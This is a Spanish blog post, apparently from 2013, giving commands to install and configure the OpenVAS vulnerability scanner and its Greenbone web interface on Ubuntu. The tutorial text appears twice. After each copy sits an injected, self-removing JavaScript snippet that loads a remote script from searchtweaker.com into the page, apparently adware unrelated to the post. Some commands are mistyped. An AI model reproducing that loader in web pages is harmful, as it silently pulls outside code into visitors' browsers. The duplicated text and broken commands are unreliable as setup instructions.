La utilización y empleo de OpenVAS-2da parte
Se acerca el gran día, sábado 12 de enero del 2013 ....
Bueno, volviendo con el tema respecto al escáner de vulnerabilidades OpenVAS , lo he probado y definitivamente dejenme recomendarle OpenVAS el merecido sucesor de NESSUS (que durante muchísimos años fue uno de los proyectos OPEN SOURCE con gran éxito) por lo que a continuación detallaré parte de los comandos para su utilización.
Descargue de la página de OpenVAS la versión más actualizada, Ubuntu y openSUSE tienen sus propios repositorios OBS, losadministradores de Ubuntu y Debian necesitan instalar un paquete,
sudo apt-get install -y install python-software-properties.
antes de integrar el repositorio el administrador puede añadir el paquete fuente de la siguiente forma en ubuntu:
sudo add-apt-repository "deb http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.10/ ./"
Usar los repositorios de seguridad de openSUSE requiere tener una llave GnuPG:
sudo apt-key adv --Keyserver hkp://keys.gnupg.net --recv-keys BED1E87979EAFD54
actualizar las versiones actuales: sudo apt-get update
Instalamos los paquetes deseados usando apt-get o con un gestor de paquetes gráfico.
sudo apt-get -y install
openvas -manager
openvas-scanner
openvas-administrador
greenbone-security-assistant sqlite3
xsltproc
Si añadimos el repositorio en el cliente podemos instalar los programas necesarios allí mismo
sudo apt-get install gsd openvas-cli
Para encriptar la comunicación debemos generar los certificados de la forma siguiente:
test -e /var/lib/openvas/CA/cacert.pem || sudo openvas-mkcert -q
El comando unix test comprueba si existe un certificado de no ser así inicia el script apropiado . Ejecutamos:
sudo openvas-nvt-nsync
Creado nuestro usuario (destroyer) generaremos un certificado de cliente haciendo lo siguiente:
test -e/var/lib/openvas/users/destroyer || sudo openvas-mkcert-client -n destroyer -i
Activamos los servicios de escáner (OpenVAS open-vassd, OpenVAS MAnager openvasmd y OpenVAS Administrator openvasad)
sudo openvassd
sudo openvasmd --migrate
sudo openvasmd --rebuild
sudo killall openvassd
sleep 15
En el futuro podremos lanzar los servicios necesarios con estos comandos:
sudo service openvas-scanner start
sudo service openvas-manager start
sudo service openvas-administrator restart
Para utilizar la intefaz web GSA, necesitamos utilizar su servicio escribiendo gsad. Asumimos que hemos instalado el paquete greenbone-security-assistant en el servidor.
sudo /etc/init.d/greenbone-security-assistant start
En la versión 4 necesitamos crear un usuario administrativo
test -e/var/lib/openvas/users/admin || sudo openvasad -c add_user -n admin -r Admin
Los administradores puede trabajar con OpenVAS de las siguientes formas : sea por linea de comando,por la aplicación de escritorio gsd o por la interfaz WEB GSA (http://OpenVAS-server:9392)
Para poder trabajar con la interfaz web debemos antes modificar la configuración de /etc/default/greenbone-security-assitant. Cambiando GSA_ADRESS=127.0.0.1 por la direcci'on IP "CORRECTA".
En el caso de no querer encriptar las comunicaciones entre la interfaz web y el gestor en la red local añadimos HTTP_ONLY=1 en el Inicio del Script . A continuación en /etc/init.d/greenbone-security-assistant reemplazaremos la linea
[ "$GSA_ADDRESS"] && DAEMONOPTS="-listen= $GSA_ADDRESS"
con
[ "$GSA_ADDRESS"] && DAEMONOPTS="--http-only"
reiniciamos GSA
/etc/init.d/greenbone-security-assitant restart
Podemos tambien trabajar Greenbone Security Desktop pero como usuario normal, no como root, por lo que escribimos: gsd en el host del cliente y nos identificamos.
A disfrutarlo ... y a su vez un merecido agradecimiento a los desarrolladores de Greenbone por su gran aporte a la comunidad.
http://arthurhuamanic.blogspot.com.es/
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Bueno, volviendo con el tema respecto al escáner de vulnerabilidades OpenVAS , lo he probado y definitivamente dejenme recomendarle OpenVAS el merecido sucesor de NESSUS (que durante muchísimos años fue uno de los proyectos OPEN SOURCE con gran éxito) por lo que a continuación detallaré parte de los comandos para su utilización.
Descargue de la página de OpenVAS la versión más actualizada, Ubuntu y openSUSE tienen sus propios repositorios OBS, losadministradores de Ubuntu y Debian necesitan instalar un paquete,
sudo apt-get install -y install python-software-properties.
antes de integrar el repositorio el administrador puede añadir el paquete fuente de la siguiente forma en ubuntu:
sudo add-apt-repository "deb http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.10/ ./"
Usar los repositorios de seguridad de openSUSE requiere tener una llave GnuPG:
sudo apt-key adv --Keyserver hkp://keys.gnupg.net --recv-keys BED1E87979EAFD54
actualizar las versiones actuales: sudo apt-get update
Instalamos los paquetes deseados usando apt-get o con un gestor de paquetes gráfico.
sudo apt-get -y install
openvas -manager
openvas-scanner
openvas-administrador
greenbone-security-assistant sqlite3
xsltproc
Si añadimos el repositorio en el cliente podemos instalar los programas necesarios allí mismo
sudo apt-get install gsd openvas-cli
Para encriptar la comunicación debemos generar los certificados de la forma siguiente:
test -e /var/lib/openvas/CA/cacert.pem || sudo openvas-mkcert -q
El comando unix test comprueba si existe un certificado de no ser así inicia el script apropiado . Ejecutamos:
sudo openvas-nvt-nsync
Creado nuestro usuario (destroyer) generaremos un certificado de cliente haciendo lo siguiente:
test -e/var/lib/openvas/users/destroyer || sudo openvas-mkcert-client -n destroyer -i
Activamos los servicios de escáner (OpenVAS open-vassd, OpenVAS MAnager openvasmd y OpenVAS Administrator openvasad)
sudo openvassd
sudo openvasmd --migrate
sudo openvasmd --rebuild
sudo killall openvassd
sleep 15
En el futuro podremos lanzar los servicios necesarios con estos comandos:
sudo service openvas-scanner start
sudo service openvas-manager start
sudo service openvas-administrator restart
Para utilizar la intefaz web GSA, necesitamos utilizar su servicio escribiendo gsad. Asumimos que hemos instalado el paquete greenbone-security-assistant en el servidor.
sudo /etc/init.d/greenbone-security-assistant start
En la versión 4 necesitamos crear un usuario administrativo
test -e/var/lib/openvas/users/admin || sudo openvasad -c add_user -n admin -r Admin
Los administradores puede trabajar con OpenVAS de las siguientes formas : sea por linea de comando,por la aplicación de escritorio gsd o por la interfaz WEB GSA (http://OpenVAS-server:9392)
Para poder trabajar con la interfaz web debemos antes modificar la configuración de /etc/default/greenbone-security-assitant. Cambiando GSA_ADRESS=127.0.0.1 por la direcci'on IP "CORRECTA".
En el caso de no querer encriptar las comunicaciones entre la interfaz web y el gestor en la red local añadimos HTTP_ONLY=1 en el Inicio del Script . A continuación en /etc/init.d/greenbone-security-assistant reemplazaremos la linea
[ "$GSA_ADDRESS"] && DAEMONOPTS="-listen= $GSA_ADDRESS"
con
[ "$GSA_ADDRESS"] && DAEMONOPTS="--http-only"
reiniciamos GSA
/etc/init.d/greenbone-security-assitant restart
Podemos tambien trabajar Greenbone Security Desktop pero como usuario normal, no como root, por lo que escribimos: gsd en el host del cliente y nos identificamos.
A disfrutarlo ... y a su vez un merecido agradecimiento a los desarrolladores de Greenbone por su gran aporte a la comunidad.
http://arthurhuamanic.blogspot.com.es/
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Escrito el January 10, 2013